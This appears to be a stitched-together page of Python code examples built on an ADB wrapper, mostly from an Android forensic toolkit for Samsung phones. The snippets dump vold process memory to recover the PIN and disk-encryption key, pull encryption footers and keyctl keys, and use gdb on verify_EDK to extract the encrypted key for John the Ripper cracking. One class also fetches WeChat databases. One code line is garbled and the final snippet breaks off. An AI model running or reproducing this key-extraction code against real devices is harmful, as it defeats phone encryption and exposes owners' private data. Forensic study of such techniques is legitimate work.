            "dump_android_memory/dump_android_memory", "%s" % self.dest_dir)
        if (push.find("bytes") == -1):
            self.print_info_adb(push, False)
            return -1

        self.printer.print_ok("Copy - Done")
        self.print_info_adb(push.rstrip("\n"))

        self.printer.print_info("Run the memory dumper.")

        dump = self.adb.shell_command(
            "su -c /data/local/tmp/dump_android_memory %s 0x%s %d %s/dumpfile"
            %
            (self.voldpid, self.datastart, self.numberofbytes, self.dest_dir))
        if (dump):
            self.printer.print_info_adb(dump, False)
            return -1
        self.printer.print_ok("Memory dumber - Done")

        self.printer.print_info("Download the dump file")

        pull = self.adb.get_remote_file(
            "/data/local/tmp/dumpfile",
            "%s/%s_%s" % (self.out_dir, self.project, self.dumpfile))
        if (pull.find("bytes") == -1):
            self.print_info_adb(pull, False)
            return -1

        self.printer.print_ok("Download - Done")
        self.print_info_adb(pull.rstrip("\n"))

        #Cleanup
        self.printer.print_info(
            "Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!"
            % self.dest_dir)
        out = self.adb.shell_command(su + "rm %s/dumpfile" % self.dest_dir)
        out = self.adb.shell_command(su + "rm %s/dump_android_memory" %
                                     self.dest_dir)
        self.printer.print_ok("Clean up - Done")

    def getpin(self):
        buff = ""
        strings = self.strings("%s/%s_%s" %
                               (self.out_dir, self.project, self.dumpfile))
        self.printer.print_info(
            "Following strings found in the vold memory segment:")
        for entry in strings:
            #self.printer.print_info("  %s:%d" % (entry.string, entry.pos))
            self.printer.print_info("  %s" % (entry.string))
        self.printer.print_info(
            "Assuming the last one is the pin/password, let's find the DEK")
        last_entry = strings[len(strings) - 1]
        index = len(last_entry.string) + last_entry.pos
        try:
            f = open("%s/%s_%s" % (self.out_dir, self.project, self.dumpfile),
                     "rb")
            try:
                buff = f.read(4096)
            finally:
                f.close()
        except IOError as e:
            self.printer.print_err("I/O error({0}): {1} {2}".format(
                e.errno, e.strerror,
                "%s/%s_%s" % (self.out_dir, self.project, self.dumpfile)))
            return -1

        for i in range(index + 1, index + 200):
            if (buff[i] != '\0'):
                break

        #Because we search for the first non zero, the search can be broken.
        dek1 = buff[i:i + 32]
        self.printer.print_info("The first possible key is:")
        self.printer.print_ok(hexlify(dek1))
        dek2 = buff[i - 1:i - 1 + 32]
        self.printer.print_info("The second possible key is:")
        self.printer.print_ok(hexlify(dek2))

        self.printer.print_info("Creating two files:")
        self.printer.print_ok("%s/%s_%s.1" %
                              (self.out_dir, self.project, self.dekfile))
        self.printer.print_ok("%s/%s_%s.2" %
                              (self.out_dir, self.project, self.dekfile))

        self.printer.print_info(
            "If they are not working, analyze the dumpfile manually and you will find the key. It works for S2 and S3 until 4.1.2."
        )

        try:
            f = open("%s/%s_%s.1" % (self.out_dir, self.project, self.dekfile),
                     "wb")
            try:
                f.write(dek1)
            finally:
                f.close()
        except IOError as e:
            self.printer.print_err("I/O error({0}): {1} {2}/{3}_footer".format(
                e.errno, e.strerror, self.out_dir, self.project))
            return -1

        try:
            f = open("%s/%s_%s.2" % (self.out_dir, self.project, self.dekfile),
                     "wb")
            try:
                f.write(dek2)
            finally:
                f.close()
        except IOError as e:
            self.printer.print_err("I/O error({0}): {1} {2}/{3}_footer".format(
                e.errno, e.strerror, self.out_dir, self.project))
            return -1

        return 1

    def print_info_adb(self, message, ok=True):
        if (ok):
            self.printer.print_info("OK! Received the following from adb: %s" %
                                    message)
        else:
            self.printer.print_err(
                "ERROR! Received the following from adb: %s" % message)

    def strings(self, filename):
        pos = 0
        strings = []
        s_entry = namedtuple("s_entry", "string pos")
        printable = set(string.printable)
        found_str = ""
        fh = open(filename, "rb")
        data = fh.read(4096)
        fh.close()
        pos = 0
        for char in data:
            pos += 1
            if char in printable:
                found_str += char
            elif len(found_str) >= 4:
                strings.append(s_entry(found_str, pos))
                found_str = ""
            else:
                found_str = ""
        return strings
Example #17
0
class SandGetFooter:


   def __init__(self, printer, config, project, adb_path="adb"):
      self.printer=printer
      self.config=config
      self.project=project
      self.params={"adbpath":{"description":"Path of the adb command",
			      "value":adb_path,
			      "required":True
			      },
		  "footer":{"description":"Is the key is stored in footer?",
			      "value":"True",
			      "required":True
			      },
		  "phonewithos":{"description":"The samsung hardware and the android version",
			      "value":"GT-I9300 4.1.2",
			      "required":True
			      },
		  "out_dir":{"description":"Where to generate the results and download files on the computer.",
			      "value":"results",
			      "required":True
			      },
		  "footer_file":{"description":"The DEK is stored in this file on the phone.",
			      "value":"/efs/metadata",
			      "required":True
			      },
		  }
      self.setparams(self.params)

   def setparams(self, params):
      self.params=params
      self.adb = ADB(self.params["adbpath"]["value"])
      self.phone = self.params["phonewithos"]["value"]
      self.out_dir = self.params["out_dir"]["value"]
      self.footer_file = self.params["footer_file"]["value"]

   def getparams(self):
      return self.params

   
   def get_footer_from_phone(self):
      
      '''
      Uploads the seek_and_read to /tmp or /data/local/tmp and runs it. Then it downloads the result footer file.
      It dumps the last 16K of the data partition, configure in the config.cfg file. Please check the given
      directories on the phone to make sure the cleanup was ok.
      '''
      
      partition=self.config.get(self.phone, "data")
      self.printer.print_debug(partition)
      self.printer.print_debug("Check for su!")
      su=checkforsu(self.adb)
      if (su==""):
	 self.printer.print_err("The su comand was not found, hope the phone in a recovery with root access!")
	 su=""
      
      #dd was too slow on the phone (5min on s3), thus we implemented a seek and read program.
   
      dest_dir=check_tmp(self.printer,self.adb,su)
      self.printer.print_info("Uploading the footer reader to %s..." % (dest_dir))
      push=self.adb.push_local_file("seek_and_read/seek_and_read","%s" % dest_dir)
      if(push.find("bytes")==-1):
	 self.printer.print_err("Could not upload the file reader: %s" % push)
	 return -1
      self.printer.print_ok("Upload - Done")

      self.printer.print_debug("Running the following command:")
      command=su+"%s/seek_and_read %s %s/footer" % (dest_dir, partition, dest_dir)
      self.printer.print_debug(command)
      out=self.adb.shell_command(command)
      if(out.find("16384")==-1):
	 self.printer.print_err("File reader did not work: %s" % out)
	 self.printer.print_info("Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!" % dest_dir)
	 out=self.adb.shell_command(su+"rm %s/footer" % dest_dir)
	 out=self.adb.shell_command(su+"rm %s/seek_and_read" % dest_dir)
	 return -1
      
      self.printer.print_info("Downloading the footer file...")
      pull=self.adb.get_remote_file("%s/footer" % dest_dir,"%s/%s_footer" % (self.out_dir, self.project))
      if(pull.find("bytes")==-1):
	 self.printer.print_err("Could not download footer file: %s" % pull)
	 self.printer.print_info("Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!" % dest_dir)
	 out=self.adb.shell_command(su+"rm %s/footer" % dest_dir)
	 out=self.adb.shell_command(su+"rm %s/seek_and_read" % dest_dir)
	 return -1 	
      self.printer.print_ok("Download - Done") 
      self.printer.print_info(pull.rstrip("\n"))
      
      #Cleanup
      self.printer.print_info("Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!" % dest_dir)
      out=self.adb.shell_command(su+"rm %s/footer" % dest_dir)
      out=self.adb.shell_command(su+"rm %s/seek_and_read" % dest_dir)

      self.printer.print_ok("Download - Done")
      return 1

   def get_footer_file(self):

      '''
      Downloads the footer_file (typical /efs/metadata) that contains the DEK on S2. It copies the file to /tmp
      or /data/local/tmp. Changes the access right to adb pull and downloads it.
      '''

      self.printer.print_debug("Check for su!")
      su=checkforsu(self.adb)
      if (su==""):
	 self.printer.print_err("The su comand was not found, hope the phone in a recovery with root access!")
	 su=""

      self.printer.print_info("Downloading the footer [ %s ] file" % self.params["footer_file"])
      pull = get_file(self.printer, self.adb, su, self.params["footer_file"], "%s/%s_footer"%(self.out_dir, self.project))
      if (pull!=-1):
	 self.printer.print_ok("Download - Done")
      return pull

   def getfooter(self):

      '''
      Decides whether the DEK is stored in file or at the end of data partition. The decision is based on the
      config.cg file.
      '''

      if(self.params["footer"]["value"]=="n"):
	 if(self.get_footer_file()==-1):
	    return -1
      else:
	 if(self.get_footer_from_phone()==-1):
	    return -1
      return 1

   
   def print_info_adb(self,message, ok=True):
      if(ok):
	 self.printer.printer.print_info("OK! Received the following from adb: %s" %message)
      else:
	 self.printer.print_error("ERROR! Received the following from adb: %s" %message)
Example #18
0
# coding: utf-8

import logging

from adb.adb import ADB

if __name__ == '__main__':

    # Logging configuration.
    logger = logging.getLogger(__name__)
    logging.basicConfig(format='%(asctime)s> [%(levelname)s][%(name)s][%(funcName)s()] %(message)s',
                        datefmt='%d/%m/%Y %H:%M:%S', level=logging.INFO)

    # This is an example file showing how the adb wrapper can be used.

    adb = ADB()

    # Start with a clean adb server.
    adb.kill_server()
    adb.connect()

    adb_version = adb.get_version()
    logger.info('ADB version: {0}'.format(adb_version))

    connected_devices = adb.get_available_devices()
    logger.info('Connected devices: {0}'.format(connected_devices))

    # Set the first device in the list as the target of the subsequent commands.
    adb.target_device = connected_devices[0]

    adb.wait_for_device()
Example #19
0
class GetKey:

   def __init__(self, printer, config, project, adb_path="adb"):
      self.printer=printer
      self.params={"adbpath":{"description":"Path of the adb command",
			      "value":adb_path,
			      "required":True
			      },
		  "dumpfile":{"description":"Where to save the memory dumpfile with the filename",
			      "value":"dumpfile",
			      "required":True
			      },
		  "out_dir":{"description":"Where to generate the results and download files on the computer.",
			      "value":"results",
			      "required":True
			      },
		  "dekfile":{"description":"Where to generate the results and download files on the computer.",
			      "value":"dek.bin",
			      "required":True
			      },
		  "phonewithos":{"description":"The samsung hardware and the android version",
			      "value":"GT-I9300 4.1.2",
			      "required":True
			      },

		  }
      self.adb = ADB(self.params["adbpath"]["value"])
      self.out_dir=self.params["out_dir"]["value"]
      self.dumpfile = self.params["dumpfile"]["value"]
      self.dekfile = self.params["dekfile"]["value"]
      self.project=project

   def setparams(self, params):
      self.params=params
      self.adb = ADB(self.params["adbpath"]["value"])
      self.dumpfile = self.params["dumpfile"]["value"]
      self.dekfile = self.params["dekfile"]["value"]
      self.phone = self.params["phonewithos"]["value"]
      self.out_dir = self.params["out_dir"]["value"]
   
   def getparams(self):
      return self.params

   def get_vold_data_segment(self):
      self.printer.print_debug("Check for su!")
      su=checkforsu(self.adb)
      if (su==""):
	 self.printer.print_err("The su comand was not found, hope adb have immediate root access!")
	 su=""
      
      #No magic here, the phone should be fully booted for this module
      self.dest_dir="/data/local/tmp"

      ps=self.adb.shell_command("su -c ps")
      self.voldpid=None
      for process in ps.splitlines():
          if(process.rfind("vold") != -1 ):
              process=re.sub("\s+", ' ' , process)	
              self.voldpid=process.split(' ')[1]
              break
          
      if self.voldpid==None:
          self.adb.shell_command("su -c start vold")
          ps=self.adb.shell_command("su -c ps")
          for process in ps.splitlines():
              if(process.rfind("vold") != -1 ):
                  process=re.sub("\s+", ' ' , process)    
                  self.voldpid=process.split(' ')[1]
                  break
          if self.voldpid==None:
              print "Couldn't find vold process. Try to start manually using \"adb shell su -c 'start vold'\""
              return -1

      self.printer.print_debug("Found vold process id: %s!" % self.voldpid)
      memsegments=self.adb.shell_command("su -c cat /proc/%s/maps" % self.voldpid).splitlines()
      for segment in memsegments:
          if(re.match(".*w-p.*vold.*", segment)!=None):
                 addresses=segment.split(" ")[0].split("-")
                 self.datastart=addresses[0]
                 self.dataend=addresses[1]
                 self.numberofbytes=int(addresses[1],16)-int(addresses[0],16)
                 break

      self.printer.print_debug("The data segment addresses are: %s - %s" % (self.datastart, self.dataend))
      
      self.printer.print_info("Copy the memory dumper to %s." % (self.dest_dir))
 
      push=self.adb.push_local_file("dump_android_memory/dump_android_memory","%s/dump_android_memory" % self.dest_dir)
      if(push.find("bytes")==-1):
	 self.print_info_adb(push, False)
	 return -1

      self.printer.print_ok("Copy - Done")
      self.print_info_adb(push.rstrip("\n"))
      
      self.printer.print_info("Run the memory dumper.")
      
      dump=self.adb.shell_command("su -c /data/local/tmp/dump_android_memory %s 0x%s %d %s/dumpfile" % (self.voldpid, self.datastart, self.numberofbytes, self.dest_dir))
      if(dump):
	 self.printer.print_info_adb(dump,False)
	 return -1
      self.printer.print_ok("Memory dumper - Done")

      self.printer.print_info("Download the dump file")
      
      pull=self.adb.get_remote_file("/data/local/tmp/dumpfile","%s/%s_%s" % (self.out_dir, self.project, self.dumpfile))
      if(pull.find("bytes")==-1):
	 self.print_info_adb(pull,False)
	 return -1

      self.printer.print_ok("Download - Done")
      self.print_info_adb(pull.rstrip("\n"))
      
      #Cleanup
      self.printer.print_info("Cleaning up! Please check the %s folder. Unsuccessfull cleanup weakens the security of the phone!!!!" % self.dest_dir)
      out=self.adb.shell_command(su+"rm %s/dumpfile" % self.dest_dir)
      out=self.adb.shell_command(su+"rm %s/dump_android_memory" % self.dest_dir)
      self.printer.print_ok("Clean up - Done")

   def getpin(self):
      buff=""
      strings=self.strings("%s/%s_%s" % (self.out_dir, self.project, self.dumpfile));
      self.printer.print_info("Following strings found in the vold memory segment:")
      for entry in strings:
	 #self.printer.print_info("  %s:%d" % (entry.string, entry.pos))
	 self.printer.print_info("  %s" % (entry.string))
      self.printer.print_info("Assuming the last one is the pin/password, let's find the DEK")
      last_entry=strings[len(strings)-1]
      index=len(last_entry.string)+last_entry.pos
      try:
	 f=open("%s/%s_%s" % (self.out_dir, self.project, self.dumpfile),"rb")
	 try:
	    buff=f.read(4096)
	 finally:
	    f.close()
      except IOError as e:
	 self.printer.print_err("I/O error({0}): {1} {2}".format(e.errno, e.strerror, "%s/%s_%s" % (self.out_dir, self.project, self.dumpfile)))
	 return -1
      
      for i in range(index+1,index+200):
	 if(buff[i]!='\0'):
	    break
      
      #Because we search for the first non zero, the search can be broken. 
      dek1=buff[i:i+32]
      self.printer.print_info("The first possible key is:")
      self.printer.print_ok(hexlify(dek1))
      dek2=buff[i-1:i-1+32]
      self.printer.print_info("The second possible key is:")
      self.printer.print_ok(hexlify(dek2))
      
      self.printer.print_info("Creating two files:")
      self.printer.print_ok("%s/%s_%s.1" % (self.out_dir, self.project, self.dekfile))
      self.printer.print_ok("%s/%s_%s.2" % (self.out_dir, self.project, self.dekfile))

      self.printer.print_info("If they are not working, analyze the dumpfile manually and you will find the key. It works for S2 and S3 until 4.1.2.")
      
      try:
	 f=open("%s/%s_%s.1" % (self.out_dir, self.project, self.dekfile),"wb")
	 try:
	       f.write(dek1)
	 finally:
	    f.close()
      except IOError as e:
	 self.printer.print_err("I/O error({0}): {1} {2}/{3}_footer".format(e.errno, e.strerror, self.out_dir, self.project))
	 return -1

      try:
	 f=open("%s/%s_%s.2" % (self.out_dir, self.project, self.dekfile),"wb")
	 try:
	       f.write(dek2)
	 finally:
	    f.close()
      except IOError as e:
	 self.printer.print_err("I/O error({0}): {1} {2}/{3}_footer".format(e.errno, e.strerror, self.out_dir, self.project))
	 return -1

 
      return 1




   def print_info_adb(self,message, ok=True):
      if(ok):
	 self.printer.print_info("OK! Received the following from adb: %s" %message)
      else:
	 self.printer.print_err("ERROR! Received the following from adb: %s" %message)
   
   def strings(self,filename):
      pos=0
      strings=[]
      s_entry=namedtuple("s_entry","string pos")
      printable=set(string.printable)
      found_str=""
      fh=open(filename,"rb")
      data=fh.read(4096)
      fh.close()
      pos=0
      for char in data:
	 pos+=1
	 if char in printable:
	    found_str+=char
	 elif len(found_str) >= 4:
	    strings.append(s_entry(found_str, pos))
	    found_str=""
	 else:
	    found_str=""
      return strings
Example #20
0
class SandSdcKeyctl:


   def __init__(self, printer, config, project, adb_path="adb"):
      self.printer=printer
      self.config=config
      self.project=project
      self.params={"adbpath":{"description":"Path of the adb command",
			      "value":adb_path,
			      "required":True
			      },
		  "phonewithos":{"description":"The samsung hardware and the android version",
			      "value":"GT-I9300 4.1.2",
			      "required":True
			      },
		  "out_dir":{"description":"Where to generate the results and download files on the computer.",
			      "value":"results",
			      "required":True
			      },
		  }
      self.setparams(self.params)

   def setparams(self, params):
      self.params=params
      self.adb = ADB(self.params["adbpath"]["value"])
      self.phone = self.params["phonewithos"]["value"]
      self.out_dir = self.params["out_dir"]["value"]

   def getparams(self):
      return self.params

   def getsdckeybin(self):
      self.printer.print_debug("Check for su!")
      su=checkforsu(self.adb)
      if (su==""):
	 self.printer.print_err("The su comand was not found, hope adb have immediate root access!")
	 su=""
      #No magic here, the phone should be fully booted for this module
      dest_dir="/data/local/tmp"
      self.printer.print_debug("We will use %s on the phone as a destination directory." % dest_dir)
      self.printer.print_info("Uploading keyctl utility to %s..." % dest_dir)
      push=self.adb.push_local_file("keyctl/keyctl","%s" % dest_dir)
      if(push.find("bytes")==-1):
	 self.printer.print_err("Could not upload the keyctl: %s" % push)
	 return -1
      self.printer.print_ok("Upload - Done")
      
      self.printer.print_info("Searching for the keyid...")
      self.printer.print_debug("Running the following command: %s %s/keyctl show @u" % (su, dest_dir))
      out=self.adb.shell_command(su+"%s/keyctl show @u" % (dest_dir))
      self.printer.print_debug("The keys on the keyring:\n%s" % out)
      keyid=""
      for line in out.splitlines():
	 if(line.find("user:"******" ").split(" ")[0]
      
      if(keyid==""):
	 self.printer.print_err("Something went wrong, could not parse 'keyctl show' output.")
	 return -1
      self.printer.print_ok("The keyid is: %s." % (keyid))
      
      self.printer.print_info("Dumping the key...")
      self.printer.print_debug("Running the following command: %s %s/keyctl pipe %s > %s/sdckey.bin" % (su, dest_dir, keyid, dest_dir))
      out=self.adb.shell_command("\"%s %s/keyctl pipe %s > %s/sdckey.bin\"" % (su, dest_dir, keyid, dest_dir))
      if(out!=None):
	 self.printer.print_err("Something went wrong: %s" % (out))
	 return -1

      self.printer.print_info("Downloading the dumped key file...")
      pull=self.adb.get_remote_file("%s/sdckey.bin" % dest_dir,"%s/%s_sdckey.bin" % (self.out_dir, self.project))
      if(pull.find("bytes")==-1):
	 self.printer.print_err("Could not download dumped key file: %s" % pull)
	 self.printer.print_info("Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!" % dest_dir)
	 out=self.adb.shell_command(su+"rm %s/sdckey.bin" % dest_dir)
	 out=self.adb.shell_command(su+"rm %s/keyctl" % dest_dir)
	 return -1
      self.printer.print_ok("Download - Done")
      #self.printer.print_info(pull.rstrip("\n"))
      
      #Cleanup
      self.printer.print_info("Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!" % dest_dir)
      out=self.adb.shell_command(su+"rm %s/sdckey.bin" % dest_dir)
      out=self.adb.shell_command(su+"rm %s/keyctl" % dest_dir)
 
      return 1
 
   def print_info_adb(self,message, ok=True):
      if(ok):
	 self.printer.printer.print_info("OK! Received the following from adb: %s" %message)
      else:
	 self.printer.print_error("ERROR! Received the following from adb: %s" %message)
Example #21
0
class Poot():
    @staticmethod
    def getNowConnectDevice():
        str = os.popen('adb devices')
        str = str.read()
        f = StringIO(str)
        deviceList = []
        while True:
            s = f.readline()
            if s == '':
                break
            s = s.split()
            if s != [] and s[0] != 'List':
                deviceList.append(s[0])
        if deviceList == []:
            raise BaseException("当前未有设备连接")
        return deviceList

    def __init__(self, device_id: str):
        self._device_id = device_id  #当前设备的连接id
        self._is_freeze = False  #是否处于冻结ui状态
        self._xml = None  #ui xml文件实列
        self._adb = ADB(self._device_id)  #adb 实例
        self._time_out = 10  #获取ui的超时时间
        self._sleep_spacing = 1  #单次获取ui睡眠间隔
        self._sleep_count = self._time_out / self._sleep_spacing  #获取ui睡眠次数

    def __call__(self, infor=None, by: By = By.text):
        if (not self._is_freeze) or (not self._xml):
            # 如果ui不是冻结的
            count = 1
            while count < self._sleep_count:
                if not self._adb.getNowUI():
                    # 未获取到ui
                    count += 1
                    time.sleep(self._sleep_spacing)
                    continue
                self._xml = "%s/%s.xml" % (adb.TEMP_UI_XML_SAVE_PATH,
                                           self._device_id)
                if not os.path.exists(self._xml):
                    #未获取到ui
                    count += 1
                    time.sleep(self._sleep_spacing)
                    continue
                if infor:
                    # 返回对应的节点代理ui
                    proxy = self.__resolve_node(self._xml)
                    proxy = proxy.offspring(infor, by)
                    if not proxy:
                        count += 1
                        time.sleep(self._sleep_spacing)
                        continue
                    return proxy
                else:
                    # 返回根节点代理ui
                    return self.__resolve_node(self._xml)
            raise BaseException(poot.NOT_FOUND_UI)
        else:
            #如果是冻结的
            self._xml = "%s/%s.xml" % (adb.TEMP_UI_XML_SAVE_PATH,
                                       self._device_id)
            if not os.path.exists(self._xml):
                raise BaseException(poot.NOT_FOUND_UI)
            if infor:
                # 返回对应的节点代理ui
                proxy = self.__resolve_node(self._xml)
                proxy = proxy.offspring(infor, by)
                if not proxy:
                    raise BaseException(poot.NOT_FOUND_UI)
                return proxy
            else:
                # 返回根节点代理ui
                return self.__resolve_node(self._xml)

    def freeze(self):
        self._is_freeze = True
        return self

    def __enter__(self):
        pass

    def __exit__(self, exc_type, exc_val, exc_tb):
        self._is_freeze = False

    def __resolve_node(self, xml):
        DomTree = parse(xml)
        root_Node = DomTree.documentElement
        node = Node(root_Node)
        #传入xml文件信息,并解析其节点信息存储至node
        return UiProxy(node, self._adb)

    def set_find_ui_timeout(self, timeout):
        '''
        设置获取ui的超时时间
        :param timeout:
        :return:
        '''
        self._time_out = timeout

    def set_find_ui_time_spacing(self, time_spacing):
        '''
        设置获取ui睡眠间隔时间
        :param time_spacing:
        :return:
        '''
        self._sleep_spacing = time_spacing

    @property
    def device_id(self):
        return self._device_id

    @inforPrint(infor="返回桌面")
    def return_home(self, *, infor=None, beforeTime=0, endTime=0):
        '''
        回到桌面
        :return:
        '''
        self._adb.returnHome()

    @inforPrint(infor="获取微信数据库")
    def get_wx_databases(self, dsc, *, infor=None, beforeTime=0, endTime=0):
        return self._adb.get_wx_databases(dsc)
Example #22
0
 def setparams(self, params):
     self.params = params
     self.adb = ADB(self.params["adbpath"]["value"])
     self.sdcard_file = os.path.basename(
         self.params["sdcard_file"]["value"])
     self.out_dir = self.params["out_dir"]["value"]
Example #23
0
class SandS4GetEDK:
    def __init__(self, printer, config, project, adb_path="adb"):
        self.printer = printer
        self.config = config
        self.project = project
        self.params = {
            "adbpath": {
                "description": "Path of the adb command",
                "value": adb_path,
                "required": True
            },
            "phonewithos": {
                "description": "The samsung hardware and the android version",
                "value": "GT-I9505 4.3.2",
                "required": True
            },
            "out_dir": {
                "description":
                "Where to generate the results and download files on the computer.",
                "value": "results",
                "required": True
            },
        }
        self.setparams(self.params)

    def setparams(self, params):
        self.params = params
        self.adb = ADB(self.params["adbpath"]["value"])
        self.phone = self.params["phonewithos"]["value"]
        self.out_dir = self.params["out_dir"]["value"]

    def getparams(self):
        return self.params

    def downloadforgdb(self, fullpath):
        """
      Downloads the fullpath for gdb. It puts the file in lib or in bin,
      Depends on the fullpath is a lib directory or not.
      """

        path, filename = os.path.split(fullpath)
        if (path.find("lib") != -1):
            out = self.adb.get_remote_file(
                fullpath, "recovery/s4/system/lib/%s" % (filename))
        else:
            out = self.adb.get_remote_file(
                fullpath, "recovery/s4/system/bin/%s" % (filename))
        return out

    def write2john(self, edk):
        """
      Simple save the edk into the prject_sanddek.jtr file to jonh the ripper
      cracking
      """

        self.printer.print_info(
            "This will be written to file %s/%s_sanddek.jtr, for jtr:" %
            (self.out_dir, self.project))
        self.printer.print_ok("%s_s4:%s" % (self.project, edk))
        try:
            f = open("%s/%s_sanddek.jtr" % (self.out_dir, self.project), "a")
            f.write("%s_s4:%s\n" % (self.project, edk))
            f.close()
        except IOError as e:
            self.printer.print_err(
                "I/O error({0}): {1}: {2}/{3}_sanddek.jtr".format(
                    e.errno, e.strerror, self.out_dir, self.project))
            return -1

    def write2footer(self, edk):
        """
      Save the EDK to a footer file. The we can use the mount modules, that
      uses the password
      """

        self.printer.print_info("Footer will be created: %s/%s_footer" %
                                (self.out_dir, self.project))
        footer = '\0' * 0x84 + unhexlify(edk)
        try:
            f = open("%s/%s_footer" % (self.out_dir, self.project), "wb")
            f.write(footer)
            f.close()
        except IOError as e:
            self.printer.print_err(
                "I/O error({0}): {1}: {2}/{3}_footer".format(
                    e.errno, e.strerror, self.out_dir, self.project))
            return -1

    def cleanup(self, gdb=None, gdbserver=None):
        """
      Tries to gently stop gdb, kill gdbserver and delete it from /data/local/tmp or /tmp
      """

        if (gdb):
            gdb.sendcontrol('c')
            gdb.sendline("detach")
            gdb.sendline("quit")
            gdb.kill(0)
        if (gdbserver):
            gdbserver.kill()

        self.adb.shell_command("rm /data/local/tmp/gdbserver")
        self.adb.shell_command("rm /tmp/gdbserver")

    def getedk(self):
        """
      Write the the help of the gdb and gdbserver, gets out the EDK on a S4.
      It puts a breakpoint on verify_EDK which is called when vdc cryptfs verifypw
      is called. The R0 register contains the EDK>
      """

        state = checkcryptostate(self.adb)
        if (state == ""):
            self.printer.print_err(
                "The phone is not encrypted. ro.crypto.state is empty!")
            return -1
        self.printer.print_debug("Check for su!")
        su = checkforsu(self.adb)
        if (su == ""):
            self.printer.print_err(
                "The su comand was not found, hope adb have immediate root access!"
            )
            su = ""

        self.printer.print_info("Downloading vold and libsec_km.so for gdb...")
        out = self.downloadforgdb("/system/bin/vold")
        if (out == None):
            self.printer.print_err("Could not download vold! Exiting...")
            return -1
        out = self.downloadforgdb("/system/lib/libsec_km.so")
        if (out == None):
            self.printer.print_err(
                "Could not download libsec_km.so! Exiting...")
            return -1
        self.printer.print_ok("Download - Done")

        self.printer.print_debug("Check the destination directory!")
        dest_dir = ""
        out = self.adb.shell_command(su + "ls /tmp")
        if (out.find("No such file or directory") != -1):
            self.printer.print_err(
                "The /tmp directory was not found! We try the /data/local/tmp directory!"
            )
            out = self.adb.shell_command(su + "ls /data/local/tmp")
            #if the directory empty, we will receive NoneType
            if (out):
                if (out.find("No such file or directory") != -1):
                    self.printer.print_err(
                        "The /data/local/tmp directory was not found!")
                    self.printer.print_err(
                        "We did not found suitable destination directory! Please start the phone with the right recovery."
                    )
                    return -1
            dest_dir = "/data/local/tmp"
        else:
            dest_dir = "/tmp"
        self.printer.print_debug(
            "Use %s on the phone as a detination directory!" % dest_dir)

        self.printer.print_info("Uploading the gdb server...")
        push = self.adb.push_local_file("gdb/gdbserver", "%s" % dest_dir)
        if (push.find("bytes") == -1):
            self.printer.print_err("Could not upload the gdb server: %s" %
                                   push)
            return -1
        self.printer.print_ok("Upload - Done")

        self.print_info_adb(push.rstrip('\n'))
        self.printer.print_info("Staring gdbserver to listen on port 23946...")
        command = "%s shell %s%s/gdbserver --multi :23946" % (
            self.adb.get_adb_path(), su, dest_dir)
        popen_args = shlex.split(command)
        self.printer.print_debug(command)
        gdbserver = subprocess.Popen(popen_args,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE)
        out = gdbserver.stdout.read(10)
        if (out.find("Listen") == -1):
            self.printer.print_err("Could not start the gdbserver:")
            self.printer.print_err("%s" % out.replace("\r\n", "\\r\\n"))
            self.printer.print_err(
                "Cleaning up! You should check the %s directory on the phone!"
                % (dest_dir))
            self.cleanup()
            return -1

        self.printer.print_debug("Forwarding tcp socket for gdbserver...")
        out = self.adb.forward_socket("tcp:23946", "tcp:23946")
        #out=self.adb.forward_socket("tcp:4446","tcp:4446")
        if (out):
            self.printer.print_err(
                "Could not bind on 127.0.0.1:23946! Cleaning up! You should check the %s directory on the phone!"
                % (dest_dir))
            self.cleanup(gdbserver=gdbserver)
            return -1

        self.printer.print_ok("Server start - Done")
        self.printer.print_info("Starting gdb...")
        #gdb=pexpect.spawn("gdb/gdb", logfile=sys.stdout)
        gdb = pexpect.spawn("gdb/gdb")
        gdb.sendline("target extended-remote :23946")
        ret = gdb.expect(
            ["Remote.*", ".*Operation.*", ".*Ignoring.*", pexpect.TIMEOUT])
        if (ret != 0):
            self.printer.print_err(
                "Could not connect to gdb server! Cleaning up! You should check the %s directory on the phone!"
                % (dest_dir))
            self.cleanup(gdb=gdb, gdbserver=gdbserver)
            return -1
        self.printer.print_ok("gdb connected - Done")

        gdb.sendline("file recovery/s4/system/bin/vold")
        ret = gdb.expect(["Reading.*", ".*No such.*", pexpect.TIMEOUT])
        if (ret != 0):
            self.printer.print_err(
                "We need the vold executable from the phone! Cleaning up! You should check the %s directory on the phone!"
                % (dest_dir))
            self.cleanup(gdb=gdb, gdbserver=gdbserver)
            return -1
        self.printer.print_debug("We sent the file command")

        gdb.sendline("set solib-search-path recovery/s4/system/lib/")

        ps = self.adb.shell_command("su -c ps")
        for process in ps.splitlines():
            if (process.rfind("vold") != -1):
                process = re.sub("\s+", ' ', process)
                self.voldpid = process.split(' ')[1]
        self.printer.print_ok("Found vold process id: %s!" % self.voldpid)

        gdb.sendline("attach %s" % (self.voldpid))
        ret = gdb.expect(["0x.*", ".*to process.*", pexpect.TIMEOUT])
        if (ret != 0):
            self.printer.print_err(
                "Could not attach to the vold process: %s! Cleaning up! You should check the %s directory on the phone!"
                % (self.voldpid, dest_dir))
            self.cleanup(gdb=gdb, gdbserver=gdbserver)
            return -1
        self.printer.print_ok("Attached vold process: %s!" % self.voldpid)

        gdb.sendline("info threads")
        gdb.expect("  4")
        thread4 = gdb.readline().split(' ')[5].split('.')[1]
        #Read the rests
        for i in xrange(3):
            gdb.readline()
        gdb.sendline("detach")
        gdb.sendline("attach %s" % (thread4))
        ret = gdb.expect(["0x.*", ".*to process.*", pexpect.TIMEOUT])
        if (ret != 0):
            self.printer.print_err(
                "Could not attach to the vold thread: %s! Cleaning up! You should check the %s directory on the phone!"
                % (thread4, dest_dir))
            self.cleanup(gdb=gdb, gdbserver=gdbserver)
            return -1
        self.printer.print_ok("Attached vold thread: %s!" % thread4)

        gdb.sendline("break verify_EDK")
        ret = gdb.expect([".*Breakpoint.*", ".*pending.*"])
        if (ret != 0):
            self.printer.print_err(
                "Could not set breakpoint on the verify_EDK function! Cleaning up! You should check the %s directory on the phone!"
            )
            gdb.sendline("n")
            self.cleanup(gdb=gdb, gdbserver=gdbserver)
            return -1
        self.printer.print_debug(
            "Breakpoint was set on the verify_EDK function.")

